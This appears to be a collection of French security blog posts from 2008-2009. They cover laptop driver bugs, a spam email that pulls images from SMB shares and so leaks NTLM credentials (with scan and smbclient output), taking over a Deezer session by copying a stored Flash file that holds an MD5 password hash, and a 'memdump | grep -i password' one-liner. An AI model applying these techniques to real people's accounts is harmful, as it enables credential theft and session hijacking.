Pour commencer, un BSoD assez récurrent provenant de la carte WiFi Intel 5300 AGN. Dommage, elle n'est officiellement pas supportée par Dell (pour le moment) ! Heureusement pour moi, Mark Russinovitch a eu le même problème sur son Vista64 :) Il suffit donc d'abandonner le driver Dell OEM et de télécharger le driver Intel en version 12.0

Ensuite, un autre BSoD avec le driver iastor.sys (Intel Matrix Storage). Assez fourbe celui là: comme c'est un pilote de disque qui plante, le système ne peut pas générer de crashdump. J'ai du recopier le Blue Screen à la main ... Là encore, le bug est documenté et la mise à jour vers un driver récent (non OEM) est censée corriger le problème.

La mise à jour du firmware pour le "hub de sécurité Broadcom", qualifiée "d'urgente" sur le site de Dell, est assez folklorique également: il est nécessaire de démarrer le système sous MS-DOS, avec le TPM désactivé ! Problème: comment démarrer sous MS-DOS un système sans lecteur de disquette ni lecteur de CD-ROM ? Comment trouver une version de MS-DOS compatible avec un lecteur de CD-ROM USB par exemple ?

Je suis passé par une solution illégale (Dell n'en proposant pas officiellement): Hiren Boot CD, un excellent outil qui possède (entre autres) les pilotes MS-DOS pour à peu près toutes les configurations USB. De plus l'outil est amorçable depuis une clé USB, ce qui permet d'y copier les mises à jour.

Mais le plus beau reste à venir: le GPS intégré ! Alors qu'il avait fonctionné lors du premier démarrage de la machine, voici qu'il n'apparait plus dans la liste des périphériques détectés après quelques semaines d'utilisation.

Je vous épargne la journée de dimanche dans la cour de mon immeuble[*] à essayer de diagnostiquer le problème. Lundi matin, un collègue plus courageux (il a installé son E4300 sous Linux ...) me signale qu'il a résolu le problème après une semaine d'investigations sur Internet.

[*] A un moment j'ai suspecté que le GPS n'était visible que s'il avait accroché des satellites.

La solution est tout simplement introuvable. Le GPS ne démarre que si une carte SIM déverrouillée (code PIN fourni) est physiquement insérée dans le laptop. Je ne sais pas quel génie de l'ergonomie a pu imaginer un système pareil, mais si je le trouve je l'oblige à rédiger une édition en LaTeX de Guerre et Paix !

Accessoirement, les Unixiens qui ne bénéficient pas de l'ergonomie et de l'intégration extrême du Dell Control Point[*] ont dû documenter les commandes AT "secrètes" à passer au pseudo-terminal qui gère à la fois la 3G, le GPS et les antennes. C'est bon à connaitre, même sous Windows ... (et même s'il n'y a plus d'HyperTerminal sous Windows Vista).

[*] Second degré.

Security has failed. And everything else, too.

2009-02-02T22:00:00.000+01:00

Une nouvelle attaque contre le Web 2.0 arrive sur le sommet de ma pile, car je vois des sites français buzzer autour (SecuObs, SecurityVibes, etc.).

Il s'agit du "Mem Jacking".

Je lis le "papier". Au moins ça n'est pas du Latex, et ça se voit.

Mais pour finir, si je comprends bien (en même temps il n'y a que 6 pages), il s'agit de lancer la commande "memdump | grep -i password". Il y a même un code en assembleur pour faire ça - ça doit être une attaque très puissante ! [*]

Dans le même ordre d'idée, Microsoft est obligé d'expliquer aux would-be hackers la différence entre un buffer overflow et la consommation de toute la mémoire allouée à la pile.

Ensuite je vais supprimer mon compte sur le site de Cigital, et là ... Software Confidence Fail ...

Je me connecte pour la première fois en RDP à mon nouveau laptop sous Vista, et là ... "erreur de certificat: le certificat a été émis par une autorité de confiance". Certificate Fail !

Je décide de rentrer chez moi (après une journée pareille), je pars faire les courses au Champion, et là ... Try Before You Buy Fail !

Et encore, ça n'est que le début: il me reste Vista 64 Fail, Dell Mini Fail et Caramail Fail. Mais ça, ça mérite un billet à part entière :)

[*] Attention, second degré.

You've got mail !

2009-01-23T23:59:00.001+01:00

Tout commence par un email qui passe au travers des mailles de l'antispam:

Comme j'ai un petit faible pour impots.gouv.fr et pour UTF-8, je regarde le code source du message pour trouver les liens à cliquer (par ailleurs je lis tout mon mail en texte brut par conviction :).

Et là ... c'est le drame !

(...)
Received: from localhost.localdomain (s216-232-70-72.bc.hsia.telus.net [216.232.70.72])
(...)
X-Mailer: Perl script "mailer.pl"
using Mail::Sender 0.8.16 by Jenda Krynicky, Czechlands
running on mail.latitudestores.com (127.0.0.1)
under account "root"
(...)
[img src="\\207.210.244.20/images/banniere.jpg" alt="Actualités 2009" width="687px" id="banniere"/]
(...)
[img src="\\\\207.210.245.78/images/actualites.jpg" alt="Actualités 2009" width="687px" id="actu"/]
(...)

(J'ai remplacé les chevrons pour protéger les innocents). Il n'y a aucun lien à cliquer ... mais deux images chargées depuis un partage SMB ???

Investigation rapide du serveur source du spam : pas de site Web accessible, une recherche inverse ne donne rien, quelques traces d'émission de spam en octobre 2007 déjà ... Le nom de domaine a été enregistré avec l'identité suivante:

Latitude mens wear
8365 Ontario Street, Unit 100
Vancouver, British Columbia V5X 3E8
Canada

Il y a quelques ports TCP ouverts:

22/tcp "SSH-1.99-OpenSSH_4.3"
23/tcp "SSH-1.99-OpenSSH_4.3"
25/tcp "220 localhost.localdomain ESMTP Sendmail 8.13.8/8.13.8; Fri, 23 Jan 2009 09:25:07 -0800"
110/tcp "+OK Dovecot ready."
3389/tcp
10000/tcp

Cela confirme la localisation de la machine (GMT-8). Mais difficile d'aller plus loin, surtout au vu du reverse DNS ("s216-232-70-72.bc.hsia.telus.net") ... L'adresse IP est-elle dynamique ? S'agit-il d'un bloc alloué à des particuliers ou des professionnels ? La machine a-t-elle été compromise, ou envoit-elle du spam de son plein gré ?

La présence d'un Remote Desktop sur TCP/3389 relié à un Windows 2003 Standard, d'un Webmin en HTTPS sur TCP/10000, et de logiciels typiques du monde Unix (SSH, Sendmail, Dovecot, ...) pourrait laisser croire qu'il y a plusieurs machines derrière cette adresse. Une analyse des IPID avec Scapy pourrait s'avérer utile.

Vu la surface d'exposition, les méthodes de compromission potentielles ne manquent pas (brute-force SSH, faille dans Webmin, ...). L'investigation a une chance sur deux de se terminer en cul-de-sac.

Passons maintenant aux deux adresses IP destination. Les bases WHOIS ne sont pas très verbeuses, a priori un simple hébergeur du côté de Dallas:

Colo4Dallas LP COLO4-BLK4 (NET-207-210-192-0-1)
207.210.192.0 - 207.210.255.255
RimuHosting COLO4-RIMUH-042108-02 (NET-207-210-244-0-1)
207.210.244.0 - 207.210.244.127

# ARIN WHOIS database, last updated 2009-01-22 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Les enregistrements DNS inverse sont plutôt ... curieux. Le premier nom de domaine n'existe pas, et le deuxième a été enregistré du côté de San Francisco.

Nom : out-of-my-hands.com
Address: 207.210.244.20

Nom : africanjudicialnetwork.org
Address: 207.210.245.78

Ces deux sites semblent de toute façon inaccessibles, le premier étant une page Apache par défaut, et le deuxième étant "cassé". Encore des machines compromises ?

Là où ça devient intéressant (si ça ne l'était pas déjà ;), c'est lorsqu'on se rend compte que ces deux machines exposent réellement un service SMB sur Internet !

Interesting ports on out-of-my-hands.com (207.210.244.20):
PORT STATE SERVICE
135/tcp closed msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Interesting ports on africanjudicialnetwork.org (207.210.245.78):
PORT STATE SERVICE
135/tcp closed msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Une tentative de connexion donne le même résultat dans les 2 cas:

$ smbclient -L \\\\207.210.244.20
Password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.2.6]

Sharename Type Comment
--------- ---- -------
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.2.6]

Server Comment
--------- -------
SMBSHARE

Workgroup Master
--------- -------
WORKGROUP SMBSHARE

Le répertoire /images/ existe réellement sur le serveur, et son contenu laisse présager de nombreuses tentatives de fraude en cours (Impôts, Voyages-Sncf, Expedia et Facebook) ...

Là où ça devient vraiment grave, c'est qu'un client Windows XP SP3 en configuration standard va s'authentifier automatiquement en LM/NTLM sur le serveur avec un tel lien !

A ce stade, il serait réellement intéressant de savoir ce qu'il advient côté serveur. Les authentifications sont-elles capturées et "craquées" ? Une attaque en relais SMB est-elle immédiatement tentée sur le poste client (on peut toutefois espérer que de nombreux FAI français filtrent les ports requis) ? Ou s'agit-il juste pour l'auteur du spam d'afficher correctement ses images ? Le problème étant que j'ai du mal à percevoir l'objectif final du spam (autre que la capture des authentifiants), celui-ci n'ayant aucun lien cliquable ...

PS. La cerise sur le gateau, c'est que Blogger sous Google Chrome a trouvé intelligent d'interpréter les liens "img" lorsque je suis passé en mode "edit HTML", puis de charger les images susdites ... donc je me suis fait avoir en écrivant ce post !

Comment accéder à un compte Deezer

2009-01-19T09:00:00.000+01:00

Les temps changent.

A une époque, quand j'invitais des gens à la maison, ils venaient avec leur tour de CD. Puis leur lecteur MP3 (iPod en tête). Maintenant ils s'installent sur mon PC et utilisent leur compte Deezer pour nous infliger leurs playlists.

Je suis également un peu paranoïaque. Alors je configure mon Firefox pour nettoyer tous les cookies à la fermeture du navigateur. Quelle surprise, donc, que de retrouver la session d'un autre ouverte lorsque je relance le navigateur !

L'explication est simple : Deezer est une application riche, utilisant massivement Flash. Et en particulier l'espace de stockage persistant offert par cette technologie.

Si vous utilisez Firefox, le fichier se trouve dans le répertoire:

%AppData%\Macromedia\Flash Player\#SharedObjects\\www.deezer.com\deezer.sol

Il s'agit d'un format binaire, mais deux chaines de caractères sautent aux yeux: l'adresse mel et un condensat MD5 (en format texte hexadécimal) correspondant au mot de passe.

Bien sûr il est envisageable d'inverser le condensat, mais le plus reste de copier le fichier".sol" directement pour rentrer dans la session de l'utilisateur ... et pouvoir enfin lui faire découvrir de la "bonne" musique :)

Mes conclusions quant à cette affaire:

Comme toujours, la mise en oeuvre des algorithmes cryptographiques est essentielle. Inutile d'utiliser MD5 si c'est pour authentifier l'utilisateur uniquement avec son hash. Cela fait partie des thèmes que j'aborde dans ma soumission au SSTIC :)
Ne jamais utiliser un PC qui n'est pas le sien. Non seulement il est impossible de faire confiance à un PC pris au hasard de nos jours, mais de plus il existe une quantité phénoménale de traces résiduelles, comme le démontrent les développements du forensics offensif (offensics).
A chaque fois qu'une nouvelle option de sécurité et/ou de confidentialité est proposée par le navigateur, les développeurs du Web 2.0 (ou les concepteurs des normes associées) inventent une méthode de contournement pour rendre l'expérience utilisateur plus riche. Ca promet ...

The Debian is for pwn!

2009-01-15T08:30:00.001+01:00

Joli headshot ce matin à la Gare de Lyon:

Pour résumer, si quelqu'un enregistre ou a enregistré le trafic SSL sur ce hotspot WiFi ces 3 dernières années, les identifiants de tous les clients Neuf sont volés.

Merci à l'extension SSL BlackList !

PS. Si quelqu'un a un contact chez SFR_Neuf_Cegetel, c'est le moment. Parce que là c'est du sérieux.

La punition

2009-01-12T09:00:00.001+01:00

La lecture du Hakin9 de janvier est particulièrement punitive. Malgré quelques articles d'une certaine tenue, on y trouve également le pire ...

Par exemple un article du "fameux" Aditya K. Sood, qui a sévit un moment sur la liste Full Disclosure en publiant des "papiers" de "recherche" avant de se voir décerner le titre de Lame Ass of the Month par Kostya et d'autres, et de disparaitre (provisoirement).

Voici un extrait de l'article. Si vous avez une idée de ce qu'est DEP (en vrai), cela devrait vous faire sourire sur le fond - et sur la forme. Désolé pour la qualité du scan, la police extrêmement fine et totalement illisible utilisée par la nouvelle maquette du journal ne passe pas bien au scan.

On trouve également un article sur Google Chrome, écrit par "un autodidacte et passionné [de sécurité informatique] motivé par l'esprit alternatif de la communauté UnderGround".

Donc si vous voulez des informations sur les choix de conception, les techniques d'isolation des processus de rendu, ou l'implémentation du moteur JavaScript V8, je vous conseille fortement de lire la bande dessinée, les papiers ou le code source.

Si par contre vous voulez halluciner avec un article écrit dans un style ampoulé et emphatique, qui présente une liste des failles publiques (disponible par ailleurs sur Secunia) pour ensuite délirer sur l'exploitation des buffer overflow dans Windows (sans prendre en compte les contre-mesures implémentées dans Chrome), alors procurez vous d'urgence ce numéro.

Voici un extrait de la conclusion pour vous donner une idée:

Il semble que l'auteur soit également modérateur du nouveau forum Hakin9-FR. Ca promet ...

PS. On ne dit pas "à coeur perdu" mais "à corps perdu". Et on ne dit pas "querelle d'églises" mais "querelles de clochers".

Utiliser OpenVPN 2.1 sous Vista64

2009-01-05T09:00:00.000+01:00

Dans la folie des dépenses d'investissement de fin d'année, mes collègues ont sélectionné pour moi un nouveau laptop de daron^H^H^H^H^H senior expert : le Dell E4300.

Passons sur les 2 mois de délai (au lieu des 10 jours annoncés), puisque la bête est arrivée pour Noël, je m'apprête à ressentir le frisson d'un top manager devant son nouveau jouet: 4 Go de RAM, 250 Go de disque, processeur Core 2 Duo, 3G+ et GPS intégrés, et ... Vista 64.

La première prise de contact avec la bête est plutôt ... rugueuse.

Un problème dans le driver de la carte BroadCom intégrée ... il est temps de chercher les mises à jour sur le site de Dell. Et là, c'est le drame:

Plusieurs centaines de Mo de mises à jour à télécharger.
La palme revient à la "mise à jour du hub de sécurité Broadcom", qui nécessite de booter sous FreeDOS avec le TPM désactivé (note: la machine est livrée sans lecteur de CD-ROM par défaut).
Certaines mises à jour "urgentes" étaient carrément identifiées comme "à venir" !

Les plus taquins d'entre vous pensent déjà "tu n'as qu'à passer sous Linux". Que nenni ! Car outre les défauts du logiciel, le matériel pêche également:

Pas de port PCMCIA mais seulement un port ExpressCard. Passe encore, c'est l'avenir.
J'aurais aimé un écran tactile (TabletPC) qui aurait beaucoup amusé ma fille - mais il parait que c'est beaucoup plus cher.
Il faut choisir en usine entre WebCam et 3G+ (WTF ? La cause en serait le positionnement de l'antenne 3G+ autour de l'écran).
La machine ne dispose que d'un seul port USB. Pas évident quand on est allergique au Touchpad de brancher une clé USB et une souris externe simultanément. Sauf si vous avez une clé eSata, bien sûr ...
Une autonomie de 3h30 max, quel que soit le système d'exploitation. Mon vieux Dell X300 atteint les 6h30 avec une batterie noname, pour un poids quasiment identique !
Et surtout, un écran brillant (limite glossy) avec des fuites lumineuses en pagaille (en clair, le noir est loin d'être noir). Et ça, c'est rédhibitoire.

Maintenant, si vous voulez continuer l'aventure sous Vista 64, voici comment faire fonctionner OpenVPN 2.1_rc15 sans avoir à élever le processus à chaque connexion.

En effet, être membre du groupe "Network Operators" ne suffit pas à OpenVPN pour pouvoir mettre à jour les tables de routage. La connexion se passe bien (le driver OpenVPN est signé, ce qui lui permet de fonctionner sous Vista 64), mais il est impossible de joindre les ressources du site distant. La correction la plus simple consiste à lancer le processus en tant qu'administrateur.

Pour éviter d'effectuer cette opération "à la main", la solution officielle consiste à créer un fichier ".manifest" attaché à l'application.

"Dans le temps", il me semblait que créer un fichier "openvpn.exe.manifest" dans le même répertoire qu'OpenVPN était suffisant. Mais dans mon cas cela ne fonctionne pas. Est-ce parce qu'OpenVPN est un processus 32-bits ? Mystère ...

La solution consiste donc à embarquer le fichier ".manifest" dans l'application, à l'aide de l'outil MT.EXE (disponible avec Visual Studio, dont les versions Express - gratuites et illimitées - sont téléchargeables ici). Oui, il existe probablement des solutions plus simples à base d'éditeurs de ressources tiers :)

Le contenu du fichier ".manifest" doit être le suivant:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>

La commande à utiliser est:

C:\Program Files (x86)\OpenVPN\bin> mt -manifest openvpn-gui-1.0.3.exe.manifest -outputresource:openvpn-gui-1.0.3.exe;#1

Et voilà !

Attention également au sous-répertoire "log", qui trouverait mieux sa place dans %AppData% (car propre à chaque utilisateur). Ce répertoire doit être en écriture pour l'utilisateur.

Puisqu'on parle de SSL ...

2009-01-01T21:30:00.000+01:00

Un beau SSTIC-fail avec Google Chrome ...

Au moins avec une interface pareille, la légendaire Mme Michu devrait comprendre qu'il y a un problème de sécurité sur ce site.

Mais l'epic fail restait à venir - car après avoir passé outre cet avertissement et saisi toutes les informations utiles à ma soumission dans l'interface Web, ma session avait expiré et le POST final a été rejeté.

Aurez-vous la tristesse de ne pas me voir officier sur l'estrade du SSTIC cette année encore ? Non car heureusement en dumpant immédiatement le processus CHROME.EXE (avec memdump), j'ai pu récupérer le contenu de ma soumission dans un buffer.

Voici donc une année 2009 qui commence bien. Bonne année à tous !

PS. Ne vous enflammez pas, le JSESSIONID ci-dessus a expiré :)

La Haine

2008-12-23T12:10:00.001+01:00

Je comprends pourquoi Latex est principalement utilisé dans le domaine de la publication scientifique. C'est un outil totalement autiste et NON collaboratif, qui permet aux chercheurs de conserver un contrôle total sur l'information. A contrario, dans le monde de l'entreprise où l'échange de documents et le partage d'informations est une nécessité, Latex s'avère être un outil totalement inadapté.

Par exemple je rédige un rapport à plusieurs avec des collègues. Le client veut évidemment un document Word - un utilisateur non-geek (soit 99,999% de la population) étant totalement incapable d'apprendre le langage de programmation Latex et de recompiler un document, si toutefois il doit le modifier (ex. gestion documentaire) ou réutiliser une partie du contenu dans une présentation. Mais l'un des participants fait son malin et m'envoie un document Latex, rédigé sous Debian.

J'ouvre le fichier PDF avec Acrobat Reader pour le copier/coller dans Word. Echec (ou plus exactement \'echec, car Acrobat Reader semble avoir un problème avec les accents).

J'utilise Acrobat Pro qui dispose des options "Enregistrer sous ..." dans les formats DOC, HTML, TXT et d'autres. Echec également (toujours ce problème d'accents).

J'ouvre le fichier source. Echec (ou plus exactement Ã©chec, si vous voyez ce que je veux dire ...).

J'utilise Tex2Word. Echec, bien sûr. Le document utilise beaucoup trop de packages exotiques.

Finalement la seule solution sera d'utiliser un éditeur de texte compatible UTF-8, de copier/coller le source, puis de supprimer la mise en forme à l'aide de la fonction rechercher/remplacer.

Ensuite une passe de correction des typos s'impose. Je ne parle pas de la grammaire, car c'est un exercice difficile, mais bien des typos idiotes comme "scna" au lieu de "scan"). Et bien que les fanboys de Latex me parlent d'Aspell, il faut bien admettre que je n'ai jamais vu personne l'utiliser (ou alors ce logiciel est vraiment très mauvais).

Bien entendu, il sera totalement impossible de récupérer les graphiques PGF/TIKZ. Aucun autre outil au monde n'est capable de comprendre ce langage de description graphique.

Et voilà comment Latex tue la productivité et la collaboration. Mais cela aurait pu être pire car je n'ai pas eu besoin de recompiler le document. Or recompiler un document ailleurs que sur la machine d'origine est une tâche impossible, pour tout un tas de raisons comme les dépendances de packages, les jeux de caractères, etc. Faites le test sous Debian, Cygwin, OpenBSD puis OpenSolaris. Le simple problème de l'encodage du fichier texte est rédhibitoire.

Heureusement l'auteur initial du document a généré un code Latex relativement correct. Car le problème dans toutes les sectes, ce sont les adeptes de rang inférieur qui adhèrent au credo de la secte sans en comprendre les fondements. Dans cette population, on trouve les utilisateurs de Lyx ou TeXnicCenter par exemple. Ce dernier offrant plus de 2 Go de packages optionnels à installer, et la possibilité de sauvegarder dans la page de code Windows-1252, il est quasiment certain que le résultat produit ne sera pas réutilisable ailleurs.

Et croyez moi, un utilisateur qui dispose de tous les plugins Firefox, tous les Widgets Vista et tous les plugins GKrellM va installer tous les packages TeXnicCenter ...

Il n'est pas besoin de chercher très loin l'explication à cet état de fait. L'auteur de Latex étant salarié de Microsoft Research, on peut suspecter que Latex n'est qu'un projet destiné à tuer la crédibilité de toute alternative à Microsoft Office ... quoiqu'on m'a dit beaucoup de bien de Google Docs :)

WiFi Security Fail

2008-12-19T09:00:00.000+01:00

Je cherchais du WiFi tandis que ma femme faisait du shopping dans Paris ... et là, c'est le drame.

A priori un routeur Linksys sans clé WEP ni WPA ... et un mot de passe par défaut sur l'interface d'administration ... Si son propriétaire ne s'est pas rendu compte du changement de SSID, c'est probablement qu'il ne sait même pas que son routeur a une fonction WiFi !

Voilà au moins quelqu'un qui n'aura pas de mal à prouver qu'il s'est fait piraté son WiFi, lorsque le décret d'application de la loi HADOPI sera publié !

Au passage, j'en ai profité pour essayer la géolocalisation par BSSID. Ca marche redoutablement bien à Paris (sauf sur cet exemple). Par contre ils n'ont pas les points d'accès 802.11a dans leur base de données :)

Où va la sécurité ?

2008-12-14T21:15:00.001+01:00

L'initiative sécurité de Microsoft est-elle un échec ?

Il n'a échappé à personne [sid][hdm] que le Patch Tuesday a été particulièrement prolifique ce mois-ci.

Par ailleurs, de nouvelles failles non corrigées sont exploitées "dans la nature" [Wordpad][IE] et [MS-SQL, dont je n'ai pas trouvé trace ailleurs] dès le lendemain - une technique qui vise à maximiser la surface d'exposition des cibles.

Est-ce donc un échec du SDL ? Les Mécapoulets sont-ils grillés ?

Il est très difficile de répondre à cette question car le "marché" des vulnérabilités se brouille de plus en plus.

Il est évident que le code dit "hérité" (c'est-à-dire le code écrit par des développeurs partis à la retraite avec leurs stock-options) est beaucoup plus difficile à corriger et à maintenir. La majorité des failles trouvées ces dernières années affectent des parsers dans des applications clientes "lourdes" et de conception ancienne (Office, Internet Explorer, Windows Media, etc.). Ce type de code est un puit sans fond pour la recherche de failles, que ce soit par analyse statique, ou par fuzzing. Il n'y a qu'à tenter de lire les spécifications du format Office pour se rendre compte de l'impossibilité d'écrire un parser correct.
Microsoft a tout intérêt à produire de "gros" patches, car celà minimise le downtime dû au reboot pour les clients, mais également le nombre de bulletins publiés chaque année (une métrique absurde s'il en est, pourtant largement employée car facilement accessible). Ce qui explique peut-être la lenteur avec laquelle certaines failles sont patchées.
La criticité des failles est également discutable. Par exemple l'une des failles patchées par MS08-073 n'est exploitable que sur Internet Explorer 5.01 ...

A ce sujet, et sans rentrer dans les détails techniques, seuls 2 patches me semblent réellement intéressants ce mois-ci : MS08-076 et MS08-077. En effet, tous les autres sont des corruptions mémoire sans innovation technique.

MS08-076 est une faille probablement détectée en interne chez Microsoft (aucun crédit n'étant donné), qui transpose l'attaque par réflexion de crédences aux codecs Windows Media. La deuxième faille concerne la fuite d'authentifiants NTLM via le protocole ISATAP (un mécanisme de transition IPv6). Pas le genre de technologies qui suscitent beaucoup d'intérêt chez les bugs hunters, et pourtant des failles qui ne nécessitent pas une ligne d'assembleur à exploiter, donc beaucoup plus fiables que la moyenne, et totalement indétectables par les outils de sécurité déployés aujourd'hui en entreprise.

C'est à se demander si les chercheurs de failles veulent réellement exploiter leurs découvertes, ou juste gagner de l'argent et/ou du crédit avec.

MS08-077 est une faille de contournement du contrôle d'accès dans le portail SharePoint 2007. Tous ceux qui ont déjà touché de près ou de loin à cette plateforme apprécieront à sa juste valeur la complexité d'une telle découverte.

MS08-067

Ce Patch Tuesday de décembre ne bouleverse finalement pas le paysage en matière de sécurité : des failles côté client, des patches à passer, des redémarrages planifiés, des codes d'exploitation laissés aux tâcherons de l'underground, dans des pays où le développement d'un outil d'exploitation complet coûte $50/mois.

La faille la plus significative de cette année 2008 reste à mon sens MS08-067. Une faille exploitable à distance sans authentification, et nous voilà revenus 4 ans en arrière au temps de Blaster et Sasser.

La seule chose qui a empêché le crash de l'Internet mondial, ce sont les filtrages et/ou la NAT déployée par les FAI depuis. Mais dans les entreprises, l'atterrissage a été douloureux. Le patch n'a pas été identifié comme suffisamment critique pour arrêter la production. Les antivirus, tout comme les soi-disantes solutions de "0day protection", n'avaient pas les bonnes signatures (sic). Les portables et les clés USB continuent d'entrer et sortir du réseau local sans contrôle. Et là, c'est le drame. Heureusement que les payloads embarqués dans les vers actuels, tels que Win32/Conficker, se contentent d'actions insignifiantes telles que voler des authentifiants pour WoW !

Je n'ai évidemment aucune information sur le sujet, mais lorsque l'armée américaine prétend être victime d'une attaque extrêment complexe, provenant des services russes, et l'obligeant à interdire l'usage des clés USB sur ses réseaux, je crains qu'il ne s'agisse que d'un ver très banal mais redoutable sur un réseau qui n'a jamais été exposé au feu d'Internet ...

Le test d'intrusion est-il mort ?

Dans le même ordre idée, l'article "Penetration Testing: Dead in 2009" m'a encore beaucoup navré.

D'abord, parce que le test de pénétration régulier fait partie intégrante de presque toutes les "normes" en sécurité (PCI/DSS, ISO 2700x, et autres), et que ces normes ne vont pas disparaitre en 2009.

Mais surtout parce que l'article est en fait une interview de la société Fortify, spécialisée dans l'audit de code source. Et même en supposant que leur outil soit parfait, qu'il soit utilisé dans tous les produits d'ici fin 2008, et que tous les utilisateurs mettent à jour en 2009 avec les produits corrigés, il faudra bien alors admettre que le (bon) test d'intrusion n'a rien à voir avec l'exploitation de failles d'implémentation ...

Les failles d'implémentation connues:

Sont facilement détectables par les scanners de vulnérabilités ;
Peuvent être corrigées rapidement par les patches de l'éditeur ;
Ne marchent pas dans la vraie vie (Windows 2008 64-bit anyone ?).

Quant au cas des failles inconnues (souvent appelées "0day"), leur cas est vite évacué car trop peu d'auditeurs en disposent, et l'effort de développement sur les plateformes modernes est trop important dans le cadre d'audits réguliers ou d'audits de conformité. Les tests "free for all", seuls applications possibles de ces failles, sont très rares puisque la plupart des entreprises ne passent déjà pas les cas simples.

Le cas PHP est bien entendu à part, puisque le coût d'une faille include est souvent marginal :)

Il est beaucoup plus intéressant dans le cadre d'un test d'intrusion d'identifier des problèmes simples (ex. compte sans mot de passe), susceptibles d'être exploités par des codes automatiques ou des employés malveillants. Ou encore des failles de conception, qui nécessitent de remettre à plat une architecture réseau ou un produit.

Si vous arrivez à persuader un service informatique qu'il est absolument nécessaire d'activer la signature SMB pour contrer les attaques en réflexion de crédences, le test a servi à quelquechose. Sinon, le client restera vulnérable à une faille de conception des protocoles LM et NTLM qui garantit le "succès" de tout test de pénétration ultérieur (sauf si l'auditeur est mauvais, ce qui peut être une conclusion intéressante).

Quel modèle de marché pour les failles ?

Dans ces conditions, la recherche de failles apparait plus comme une activité intellectuelle et ludique que comme la seule et unique source d'intrusion en 2009.

Les américains, prompts à quantifier et à titriser, tentent depuis longtemps d'assigner une valeur monétaire aux "0day" pour imaginer dompter la bête (voir à ce sujet le débat lancé sur la liste Daily Dave - il est vrai que la société Immunity ne tarit pas d'éloges sur les vertus du "0day") .

Compte-tenu du fait que la loi du marché à tout prix a provoqué la crise mondiale que l'on sait, j'ai du mal à voir comme un marché du "0day" va stimuler la sécurité informatique du côté défensif ... D'autant que les pratiques dans le domaine ne sont déjà plus très étiques, et que les pirates résidant en dehors du "monde libre" sont peu susceptibles de vendre à des américains.

D'autres chercheurs de failles (européens: [WSLabi][Vupen]) se tournent vers les vendeurs d'IDS/IPS : "achetez tel produit car c'est le seul à vous protéger contre la dernière faille dans Internet Explorer, dont seuls les chinois disposent !". Tant d'années au service de la sensibilisation des utilisateurs et des bonnes pratiques pour entendre ça ... c'est triste. Si personne ne surfait sous le compte "administrateur", on en serait pas là. Heureusement que d'autres prédisent la mort des IDS/IPS en 2009 :)

D'ailleurs Snort s'oriente vers la fonction de "Passive Vulnerability Scanner" plutôt que vers la détection hardcore, vouée à l'échec.

Voilà, c'est tout pour aujourd'hui. Si vous en voulez plus, il faudra voter pour ma soumission à SSTIC. Ah non je dois confondre avec BlackHat, le processus de sélection des soumissions à SSTIC reste totalement obscur pour moi :)

Mise à jour du troll Latex

2008-12-08T09:00:00.000+01:00

Quand on voit ceci, peut-on réellement croire "qu'au moins, Latex est l'outil respectant le plus les règles typographiques et la mise en page des documents" ?

(Source: newsletter n°48 du CERTA. Oui j'aime bien lire les newsletters :)

Ceci n'est pas du sport ...

2008-12-03T01:57:00.002+01:00

... mais ça pourrait le devenir.

Et oui, pour les béotiens qui confondent Evaluation et Certification, sachez que ESPN est un site sportif de premier plan, tandis que CSPN est une nouvelle initiative du gouvernement français.

Qu'ils soient pardonnés, car il n'est pas facile de s’y retrouver dans la profusion d'annonces autour de la "sécurité" (telles que la plateforme Internet Signalement ou les gesticulations autour de la loi HADOPI).

L’objectif de la Certification Sécurité de Premier Niveau est louable : il s’agit de vérifier que des fonctions de sécurité essentielles sont assurées par un produit d’usage courant, en temps et en budget contraint – d’aucun parlerait de certification "agile", par opposition aux évaluations de type Critères Communs. Ces dernières ne sont praticables que sur des systèmes très contraints, toute autre tentative étant vouée à l’échec.

Bien entendu, on peut débattre à l’envi des conditions dans lesquelles cette certification a été mise en œuvre. Par exemple tous les CESTI sont automatiquement devenus évaluateurs potentiels pour la CSPN. On conçoit mal qu’un laboratoire capable de délivrer une certification EAL4 à un VPN ne puisse pas vérifier la solidité du chiffrement de WinZip. Mais on imagine quand même que le processus de certification Critères Communs, impliquant une forte coopération de l’éditeur, est assez différent d’une évaluation de 20 jours parfois sans accès au code source.

Les premiers résultats de cette certification étant tombés, on peut également être surpris par le choix des produits certifiés : Trango Hypervisor, Blancco Data Cleaner, et TrueCrypt. Si le choix de ce dernier est assez logique, les deux premiers sont quasi-inconnus et bénéficient d’une publicité d’enfer via un site institutionnel, qu'ils ne se privent pas d'exploiter - le tout pour une somme assez modique (20 jours de consultant). Trango venant d'être racheté par VMWare, et Blancco étant une société Finlandaise, on ne voit pas trop l'intérêt pour la DCSSI de s'engager dans cette voie.

Parmi les détails amusants, on notera la référence à FrSIRT (page 16) comme portail de référence (son propriétaire n’ayant pourtant pas toujours été en odeur de sainteté dans les sphères gouvernementales) – et on notera aussi que Sogeti n’a pas rendu son rapport définitif. C’est probablement comme le SSTIC – il y a du rab’ pour ceux qui galèrent avec Latex :)

Bien entendu, le challenge consiste maintenant à mettre en défaut la certification d’un produit, malgré l’avertissement chapeau assez explicite :
"La certification ne constitue pas en soi une recommandation du produit par la Direction centrale de la sécurité des systèmes d’information (DCSSI), et ne garantit pas que le produit certifié soit totalement exempt de vulnérabilités exploitables."

Dans la pratique, ça n’est pas aussi simple : les rapports des produits certifiés font déjà état de failles avérées dans certaines configurations. Par exemple le produit d’effacement sécurisé ne sait pas accéder à la zone HPA sur les disques IDE, alors qu’il y parvient sur les disques SATA !

Tout comme pour les critères communs, la certification obtenue doit être replacée dans le contexte de la cible de sécurité. Dans ces conditions, la probabilité de trouver une faille qui aurait échappée au certificateur est beaucoup plus faible.

Et les produits qui échouent lamentablement à passer la certification n'apparaissent nulle part - tout est bien qui finit bien, donc :)

Passons maintenant au jeu de la newsletter, à l’aide du script Python suivant :

fp = open("newsletter52.txt", "ra")
all = fp.readlines()
fp.close()

count = 0
for l in all:
words = l.split(" ")
for w in words:
if ((len(w) == 5) and (w.startswith("270"))):
count = count + 1

